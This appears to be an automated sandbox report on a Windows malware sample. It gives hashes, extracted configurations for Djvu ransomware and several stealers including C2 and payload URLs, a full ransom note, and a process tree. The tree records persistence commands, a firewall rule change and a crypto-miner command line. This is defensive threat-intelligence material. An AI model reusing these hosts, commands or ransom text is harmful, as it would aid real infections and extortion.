Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-09-2022 07:02

General

  • Target

    bc344fa8dbd94f5389ffa55482ad2a9eae87b440002fdded287e838264982fc4.exe

  • Size

    169KB

  • MD5

    b5743d736182e9f8bccdb2f961b055ea

  • SHA1

    a7f495b07c2be124f46a74995d62e87dc1ebdad1

  • SHA256

    bc344fa8dbd94f5389ffa55482ad2a9eae87b440002fdded287e838264982fc4

  • SHA512

    8e0d8ded1b0a4f13bc9b91430dddad8dcbcea6c684eeab5ffde2b93ce7f569e62c6526a0cef8b5eba23c2d0fd46b49b1036baa46cd294df8d714394abc838198

  • SSDEEP

    3072:kJKLTp55WvFo5J0VWXhj8K/FpHagmNBAuBM/PkW4n:TLTFtYWXBHaF

Malware Config

Extracted

Family

djvu

C2

http://winnlinne.com/lancer/get.php

Attributes
  • extension

    .ofww

  • offline_id

    xkNzhkB1wvgoDI7Uo0HPNLY3qCuwoFpP7nlhlut1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://winnlinne.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-EWKSsSJiVn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0569Jhyjd

rsa_pubkey.plain

Extracted

Family

vidar

Version

54.6

Botnet

517

C2

https://t.me/huobiinside

https://mas.to/@kyriazhs1975

Attributes
  • profile_id

    517

Extracted

Family

raccoon

Botnet

7394a7fc5da9794209d8b0503ca4abf4

C2

http://45.8.145.203

rc4.plain

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Extracted

Family

redline

Botnet

LogsDiller Cloud (Sup: @mr_golds)

C2

77.73.134.27:8163

Attributes
  • auth_value

    56c6f7b9024c076f0a96931453da7e56

Signatures

  • DcRat 6 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 10 IoCs
  • Detects Smokeloader packer 2 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • XMRig Miner payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 52 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc344fa8dbd94f5389ffa55482ad2a9eae87b440002fdded287e838264982fc4.exe
    "C:\Users\Admin\AppData\Local\Temp\bc344fa8dbd94f5389ffa55482ad2a9eae87b440002fdded287e838264982fc4.exe"
    1⤵
    • DcRat
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:3756
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\421A.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\421A.dll
      2⤵
      • Loads dropped DLL
      PID:4424
  • C:\Users\Admin\AppData\Local\Temp\43A1.exe
    C:\Users\Admin\AppData\Local\Temp\43A1.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:3076
  • C:\Users\Admin\AppData\Local\Temp\4AC6.exe
    C:\Users\Admin\AppData\Local\Temp\4AC6.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3676
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA1AA==
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3316
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      2⤵
        PID:3276
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        2⤵
          PID:4028
      • C:\Users\Admin\AppData\Local\Temp\4DC5.exe
        C:\Users\Admin\AppData\Local\Temp\4DC5.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:900
        • C:\Users\Admin\AppData\Local\Temp\4DC5.exe
          C:\Users\Admin\AppData\Local\Temp\4DC5.exe
          2⤵
          • DcRat
          • Executes dropped EXE
          • Checks computer location settings
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Users\Admin\AppData\Local\13713e86-e7e1-4128-9aa8-cd9f80b4f612" /deny *S-1-1-0:(OI)(CI)(DE,DC)
            3⤵
            • Modifies file permissions
            PID:3736
          • C:\Users\Admin\AppData\Local\Temp\4DC5.exe
            "C:\Users\Admin\AppData\Local\Temp\4DC5.exe" --Admin IsNotAutoStart IsNotTask
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1700
            • C:\Users\Admin\AppData\Local\Temp\4DC5.exe
              "C:\Users\Admin\AppData\Local\Temp\4DC5.exe" --Admin IsNotAutoStart IsNotTask
              4⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3580
              • C:\Users\Admin\AppData\Local\26bcae6b-89ff-4a8b-b678-0036b99fd2d8\build2.exe
                "C:\Users\Admin\AppData\Local\26bcae6b-89ff-4a8b-b678-0036b99fd2d8\build2.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4928
                • C:\Users\Admin\AppData\Local\26bcae6b-89ff-4a8b-b678-0036b99fd2d8\build2.exe
                  "C:\Users\Admin\AppData\Local\26bcae6b-89ff-4a8b-b678-0036b99fd2d8\build2.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:1272
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" \/c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\26bcae6b-89ff-4a8b-b678-0036b99fd2d8\build2.exe" & del C:\PrograData\*.dll & exit
                    7⤵
                      PID:2448
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im build2.exe /f
                        8⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2120
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 6
                        8⤵
                        • Delays execution with timeout.exe
                        PID:5060
                • C:\Users\Admin\AppData\Local\26bcae6b-89ff-4a8b-b678-0036b99fd2d8\build3.exe
                  "C:\Users\Admin\AppData\Local\26bcae6b-89ff-4a8b-b678-0036b99fd2d8\build3.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:1752
                  • C:\Windows\SysWOW64\schtasks.exe
                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                    6⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:2208
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe
          1⤵
          • Accesses Microsoft Outlook profiles
          • outlook_office_path
          • outlook_win_path
          PID:836
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe
          1⤵
            PID:3108
          • C:\Users\Admin\AppData\Local\Temp\C845.exe
            C:\Users\Admin\AppData\Local\Temp\C845.exe
            1⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:2148
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              2⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:100212
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bestrealprizes.life/?u=lq1pd08&o=hdck0gl
                3⤵
                • Adds Run key to start application
                • Enumerates system info in registry
                • Modifies registry class
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                PID:103032
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffab8b146f8,0x7ffab8b14708,0x7ffab8b14718
                  4⤵
                    PID:103060
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
                    4⤵
                      PID:3648
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3
                      4⤵
                        PID:4944
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3252 /prefetch:8
                        4⤵
                          PID:1960
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
                          4⤵
                            PID:680
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
                            4⤵
                              PID:1356
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5180 /prefetch:8
                              4⤵
                                PID:3424
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
                                4⤵
                                  PID:3440
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
                                  4⤵
                                    PID:4928
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
                                    4⤵
                                      PID:1752
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5808 /prefetch:8
                                      4⤵
                                        PID:2384
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
                                        4⤵
                                          PID:2836
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                                          4⤵
                                            PID:492
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8
                                            4⤵
                                              PID:5284
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                              4⤵
                                              • Drops file in Program Files directory
                                              PID:5440
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff600ff5460,0x7ff600ff5470,0x7ff600ff5480
                                                5⤵
                                                  PID:5460
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,6669142243669052310,7244750615620555258,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8
                                                4⤵
                                                  PID:5520
                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:103128
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                  4⤵
                                                    PID:103204
                                                    • C:\Users\Admin\AppData\Local\Temp\seup.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\seup.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Executes dropped EXE
                                                      • Checks BIOS information in registry
                                                      • Checks computer location settings
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:3584
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                        6⤵
                                                        • DcRat
                                                        • Creates scheduled task(s)
                                                        PID:5180
                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:5736
                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                        6⤵
                                                          PID:5784
                                                          • C:\Users\Admin\AppData\Local\Temp\seup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\seup.exe"
                                                            7⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks computer location settings
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:5920
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                              8⤵
                                                              • DcRat
                                                              • Creates scheduled task(s)
                                                              PID:6088
                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:6176
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                              8⤵
                                                                PID:6224
                                                • C:\Users\Admin\AppData\Local\Temp\CAF6.exe
                                                  C:\Users\Admin\AppData\Local\Temp\CAF6.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  PID:7412
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ssxcvnan\
                                                    2⤵
                                                      PID:30088
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\admjldtw.exe" C:\Windows\SysWOW64\ssxcvnan\
                                                      2⤵
                                                        PID:36032
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" create ssxcvnan binPath= "C:\Windows\SysWOW64\ssxcvnan\admjldtw.exe /d\"C:\Users\Admin\AppData\Local\Temp\CAF6.exe\"" type= own start= auto DisplayName= "wifi support"
                                                        2⤵
                                                        • Launches sc.exe
                                                        PID:42612
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" description ssxcvnan "wifi internet conection"
                                                        2⤵
                                                        • Launches sc.exe
                                                        PID:46904
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" start ssxcvnan
                                                        2⤵
                                                        • Launches sc.exe
                                                        PID:52988
                                                      • C:\Windows\SysWOW64\netsh.exe
                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                        2⤵
                                                        • Modifies Windows Firewall
                                                        PID:59416
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 1096
                                                        2⤵
                                                        • Program crash
                                                        PID:70884
                                                    • C:\Users\Admin\AppData\Local\Temp\CD49.exe
                                                      C:\Users\Admin\AppData\Local\Temp\CD49.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:14480
                                                    • C:\Users\Admin\AppData\Local\Temp\D1FD.exe
                                                      C:\Users\Admin\AppData\Local\Temp\D1FD.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      • Suspicious use of SetThreadContext
                                                      PID:25764
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA4AA==
                                                        2⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:76792
                                                      • C:\Users\Admin\AppData\Local\Temp\D1FD.exe
                                                        C:\Users\Admin\AppData\Local\Temp\D1FD.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:6292
                                                    • C:\Users\Admin\AppData\Local\Temp\D9ED.exe
                                                      C:\Users\Admin\AppData\Local\Temp\D9ED.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:41592
                                                    • C:\Windows\SysWOW64\explorer.exe
                                                      C:\Windows\SysWOW64\explorer.exe
                                                      1⤵
                                                        PID:42620
                                                      • C:\Windows\explorer.exe
                                                        C:\Windows\explorer.exe
                                                        1⤵
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:52112
                                                      • C:\Windows\SysWOW64\explorer.exe
                                                        C:\Windows\SysWOW64\explorer.exe
                                                        1⤵
                                                          PID:59428
                                                        • C:\Windows\SysWOW64\ssxcvnan\admjldtw.exe
                                                          C:\Windows\SysWOW64\ssxcvnan\admjldtw.exe /d"C:\Users\Admin\AppData\Local\Temp\CAF6.exe"
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:60580
                                                          • C:\Windows\SysWOW64\svchost.exe
                                                            svchost.exe
                                                            2⤵
                                                            • Sets service image path in registry
                                                            • Drops file in System32 directory
                                                            • Suspicious use of SetThreadContext
                                                            • Modifies data under HKEY_USERS
                                                            PID:72900
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
                                                              3⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:102660
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 60580 -s 532
                                                            2⤵
                                                            • Program crash
                                                            PID:77340
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe
                                                          1⤵
                                                            PID:64560
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7412 -ip 7412
                                                            1⤵
                                                              PID:67420
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              C:\Windows\SysWOW64\explorer.exe
                                                              1⤵
                                                                PID:70872
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 60580 -ip 60580
                                                                1⤵
                                                                  PID:74280
                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                  1⤵
                                                                    PID:75140
                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                    1⤵
                                                                      PID:81360
                                                                    • C:\Windows\explorer.exe
                                                                      C:\Windows\explorer.exe
                                                                      1⤵
                                                                        PID:87912
                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                        1⤵
                                                                          PID:95948
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          PID:102924
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                            2⤵
                                                                            • DcRat
                                                                            • Creates scheduled task(s)
